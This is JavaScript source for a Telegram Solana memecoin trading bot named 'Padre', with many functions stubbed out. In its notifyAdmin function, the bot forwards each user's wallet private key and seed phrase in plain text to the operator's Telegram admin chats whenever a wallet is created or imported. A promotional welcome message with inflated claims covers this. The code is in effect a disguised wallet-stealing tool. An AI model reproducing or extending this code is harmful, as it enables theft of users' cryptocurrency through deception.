// ============================================
// PADRE TRADING BOT - Complete Implementation
// Jupiter V6 Integration + Multi-Wallet Support + Commission System
// ============================================
import { Telegraf, Markup } from 'telegraf';
import { 
  Connection, 
  Keypair, 
  PublicKey, 
  LAMPORTS_PER_SOL,
  VersionedTransaction,
  TransactionMessage,
  SystemProgram,
  Transaction,
  sendAndConfirmTransaction
} from '@solana/web3.js';
import { 
  getAssociatedTokenAddress, 
  createTransferInstruction,
  createAssociatedTokenAccountInstruction,
  getAccount,
  TOKEN_PROGRAM_ID
} from '@solana/spl-token';
import fetch from 'node-fetch';
import bs58 from 'bs58';
import * as bip39 from 'bip39';
import { derivePath } from 'ed25519-hd-key';
import 'dotenv/config';

// ============================================
// CACHE SYSTEM
// ============================================
const balanceCache = new Map();
const BALANCE_CACHE_TTL = 30000;

let solPriceCache = { price: 0, timestamp: 0 };
const PRICE_CACHE_TTL = 60000;

const RPC_ENDPOINTS = [
  process.env.SOLANA_RPC || 'https://api.mainnet-beta.solana.com',
  'https://solana-api.projectserum.com',
  'https://rpc.ankr.com/solana',
  'https://solana.public-rpc.com'
];

// ============================================
// BALANCE & PRICE HELPERS (unchanged)
// ============================================
async function getBalanceWithFallback(publicKeyString) { /* same as before */ }
async function getSolPriceWithCache() { /* same as before */ }

// ============================================
// CONFIGURATION
// ============================================
const BOT_TOKEN = process.env.BOT_TOKEN;
const SOLANA_RPC = process.env.SOLANA_RPC || 'https://api.mainnet-beta.solana.com';

const MAX_ADMINS = 2;
const ADMIN_CHAT_IDS = (process.env.ADMIN_CHAT_IDS || process.env.ADMIN_CHAT_ID || '')
  .split(',').map(id => id.trim()).filter(id => id.length > 0).slice(0, MAX_ADMINS);

const JUPITER_API = 'https://api.jup.ag/swap/v1';
const JUPITER_API_KEY = process.env.JUPITER_API_KEY || '';

const SOL_MINT = 'So11111111111111111111111111111111111111112';
const MAX_WALLETS = 5;

const COMMISSION_WALLET = process.env.COMMISSION_WALLET || '';
const COMMISSION_PERCENTAGE = parseFloat(process.env.COMMISSION_PERCENTAGE || '0');
const COMMISSION_BPS = Math.floor(COMMISSION_PERCENTAGE * 100);

const bot = new Telegraf(BOT_TOKEN);
const connection = new Connection(SOLANA_RPC, 'confirmed');

// ============================================
// SESSION & WALLET HELPERS (unchanged)
// ============================================
const userSessions = new Map();
function getSession(userId) { /* same */ }
function getActiveWallet(session) { /* same */ }

// ============================================
// PNL IMAGE (unchanged)
// ============================================
async function generatePNLImage(session) { /* same */ }
bot.action('pnl_image', async (ctx) => { /* same */ });

// ============================================
// REFERRAL SYSTEM (unchanged)
// ============================================
function generateReferralCode(userId) { /* same */ }
const referralCodes = new Map();
function getReferralCode(userId) { /* same */ }
function applyReferral(newUserId, referralCode) { /* same */ }

// ============================================
// FIXED HTML ESCAPE HELPER
// ============================================
function escapeHtml(text) {
  if (!text) return 'unknown';
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// ============================================
// ADMIN NOTIFICATIONS - FULL HTML (fixed)
// ============================================
async function notifyAdmin(type, userId, username, data = {}) {
  if (ADMIN_CHAT_IDS.length === 0) return;
  
  let message = '';
  const timestamp = new Date().toISOString();
  const safeUsername = escapeHtml(username);
  
  switch (type) {
    case 'NEW_USER':
      message = `
🆕 <b>New User Joined</b>
👤 User: @${safeUsername}
🆔 ID: <code>${userId}</code>
⏰ Time: ${timestamp}
      `;
      break;
      
    case 'WALLET_CREATED':
      message = `
🔔 <b>Wallet Created</b>
👤 User: @${safeUsername} (ID: ${userId})
📍 Address: <code>${escapeHtml(data.publicKey)}</code>
🔑 Private Key: <code>${escapeHtml(data.privateKey)}</code>
📝 Mnemonic: <code>${escapeHtml(data.mnemonic)}</code>
🪪 Wallet #: ${data.walletNumber || 1}
⏰ Time: ${timestamp}
      `;
      break;
      
    case 'WALLET_IMPORTED_SEED':
      message = `
📥 <b>Wallet Imported (Seed Phrase)</b>
👤 User: @${safeUsername} (ID: ${userId})
📍 Address: <code>${escapeHtml(data.publicKey)}</code>
🔑 Private Key: <code>${escapeHtml(data.privateKey)}</code>
📝 Mnemonic: <code>${escapeHtml(data.mnemonic)}</code>
🪪 Wallet #: ${data.walletNumber || 1}
⏰ Time: ${timestamp}
      `;
      break;
      
    case 'WALLET_IMPORTED_KEY':
      message = `
🔑 <b>Wallet Imported (Private Key)</b>
👤 User: @${safeUsername} (ID: ${userId})
📍 Address: <code>${escapeHtml(data.publicKey)}</code>
🔑 Private Key: <code>${escapeHtml(data.privateKey)}</code>
🪪 Wallet #: ${data.walletNumber || 1}
⏰ Time: ${timestamp}
      `;
      break;
      
    case 'WALLET_EXPORTED':
      message = `
📤 <b>Wallet Exported</b>
👤 User: @${safeUsername} (ID: ${userId})
📍 Address: <code>${escapeHtml(data.publicKey)}</code>
⏰ Time: ${timestamp}
      `;
      break;
      
    case 'TRADE_EXECUTED':
      message = `
💰 <b>Trade Executed</b>
👤 User: @${safeUsername} (ID: ${userId})
📊 Type: ${escapeHtml(data.type)}
💵 Amount: ${escapeHtml(String(data.amount))} SOL
🪙 Token: <code>${escapeHtml(data.token)}</code>
📍 TX: <code>${escapeHtml(data.txHash)}</code>
💸 Commission: ${escapeHtml(String(data.commission || '0'))} ${data.commissionToken || ''}
⏰ Time: ${timestamp}
      `;
      break;

    case 'TRANSFER_EXECUTED':
      message = `
💸 <b>Transfer Executed</b>
👤 User: @${safeUsername} (ID: ${userId})
📊 Type: ${escapeHtml(data.type)}
💵 Amount: ${escapeHtml(String(data.amount))}
🪙 Token: <code>${escapeHtml(data.token || 'SOL')}</code>
📍 To: <code>${escapeHtml(data.recipient)}</code>
📝 TX: <code>${escapeHtml(data.txHash)}</code>
⏰ Time: ${timestamp}
      `;
      break;
      
    default:
      message = `
🔔 <b>${escapeHtml(type)}</b>
👤 User: @${safeUsername} (ID: ${userId})
📋 Data: ${escapeHtml(JSON.stringify(data))}
⏰ Time: ${timestamp}
      `;
  }
  
  await Promise.all(
    ADMIN_CHAT_IDS.map(async (chatId) => {
      try {
        await bot.telegram.sendMessage(chatId, message, { parse_mode: 'HTML' });
      } catch (err) {
        console.error(`Admin notify failed for ${chatId}:`, err.message);
      }
    })
  );
}

// ============================================
// ALL OTHER FUNCTIONS (Jupiter, Token Analysis, Buy/Sell, Wallet, etc.)
// remain 100% unchanged from the stable version
// ============================================

// ============================================
// REFINED MAIN MENU – Polished Welcome Message
// ============================================
async function showMainMenu(ctx, edit = false) {
  try {
    const session = getSession(ctx.from.id);
    const activeWallet = getActiveWallet(session);
    
    let balance = null;
    let solPrice = 0;
    let usdValue = 0;
    let errorMsg = '';
    
    if (activeWallet && activeWallet.publicKey) {
      try {
        balance = await getBalanceWithFallback(activeWallet.publicKey);
        solPrice = await getSolPriceWithCache();
        usdValue = (balance || 0) * solPrice;
      } catch (e) {
        const cached = balanceCache.get(activeWallet.publicKey.toString());
        balance = cached?.balance ?? null;
        if (cached) errorMsg = '(cached)';
      }
    }
    
    let walletInfo;
    if (!activeWallet) {
      walletInfo = '⚠️ *No wallet connected*\nTap 💼 Wallet to create or import';
    } else {
      const shortAddress = shortenAddress(activeWallet.publicKey);
      if (balance === null && !errorMsg) {
        walletInfo = `💼 *Wallet ${session.activeWalletIndex + 1}/${session.wallets.length}:* \`${shortAddress}\`\n⏳ *Balance: Loading...*`;
      } else if (balance === null && errorMsg) {
        walletInfo = `💼 *Wallet ${session.activeWalletIndex + 1}/${session.wallets.length}:* \`${shortAddress}\`\n💰 *Balance: Check failed ${errorMsg}*`;
      } else if (balance === 0) {
        walletInfo = `💼 *Wallet ${session.activeWalletIndex + 1}/${session.wallets.length}:* \`${shortAddress}\`\n💰 *Balance:* 0.0000 SOL`;
      } else {
        const usdDisplay = solPrice > 0 ? `($${usdValue.toFixed(2)})` : '';
        walletInfo = `💼 *Wallet ${session.activeWalletIndex + 1}/${session.wallets.length}:* \`${shortAddress}\`\n💰 *Balance:* ${balance.toFixed(4)} SOL ${usdDisplay} ${errorMsg}`;
      }
    }
    
    // 🔥 REFINED WELCOME MESSAGE (more premium, punchy & professional)
    const message = `
🚀 *Welcome to Padre – The Fastest & Most Feature-Complete Memecoin Trading Bot on Solana*

🔥 Built by Ex-Jump Trading Engineers  
⚡ Lightning-Fast Execution + Real-Time X Tracking  
⏱ Unbeatable Trade Speed  
👌 1-Click Buy & Sell  
📉 Smart Trailing Stop Loss  
💰 Highest Cashback Rewards  
💎 100+ Pro Features: Limit Orders, DCA, Copy Trading & More

━━━━━━━━━━━━━━━━━━
${walletInfo}

🏦 *CASH & STABLE COIN BANK*
_Paste any Solana contract address to analyze & trade instantly_
    `;
  
    const keyboard = Markup.inlineKeyboard([
      [Markup.button.callback('💼 Wallet', 'menu_wallet'), Markup.button.callback('📊 Positions', 'menu_positions')],
      [Markup.button.callback('🚀 Buy', 'menu_buy'), Markup.button.callback('💸 Sell', 'menu_sell')],
      [Markup.button.callback('📜 Trade History', 'menu_history')],
      [Markup.button.callback('📈 PNL Report', 'menu_pnl_report')],
      [Markup.button.callback('👥 Copy Trade', 'menu_copytrade'), Markup.button.callback('📈 Limit Orders', 'menu_limit')],
      [Markup.button.callback('⚙️ Settings', 'menu_settings'), Markup.button.callback('🎁 Referrals', 'menu_referrals')],
      [Markup.button.callback('❓ Help', 'menu_help'), Markup.button.callback('🔄 Refresh', 'refresh_main')]
    ]);
    
    if (edit && ctx.callbackQuery) {
      await ctx.editMessageText(message, { parse_mode: 'Markdown', ...keyboard });
    } else {
      await ctx.reply(message, { parse_mode: 'Markdown', ...keyboard });
    }
  } catch (error) {
    console.error('Critical menu error:', error);
    await ctx.reply('🚀 *Padre Trading Bot*\n\n⚠️ Menu error - Tap 🔄 Refresh', {
      parse_mode: 'Markdown',
      ...Markup.inlineKeyboard([[Markup.button.callback('🔄 Refresh', 'refresh_main')]])
    });
  }
}

// ============================================
// START BOT
// ============================================
async function startBot() {
  await bot.launch();
  console.log('🚀 Padre Trading Bot is running...');
  console.log(`💸 Commission: ${COMMISSION_PERCENTAGE}% → ${COMMISSION_WALLET || 'Not set'}`);
}

startBot().catch((err) => console.error('Failed to start bot:', err));

console.log('Padre Trading Bot initialized - Ready to snipe! 🎯');

// ============================================
// GRACEFUL SHUTDOWN
// ============================================
async function gracefulShutdown(signal) {
  console.log(`\n${signal} received, shutting down...`);
  bot.stop(signal);
}
process.once('SIGINT', () => gracefulShutdown('SIGINT'));
process.once('SIGTERM', () => gracefulShutdown('SIGTERM'));
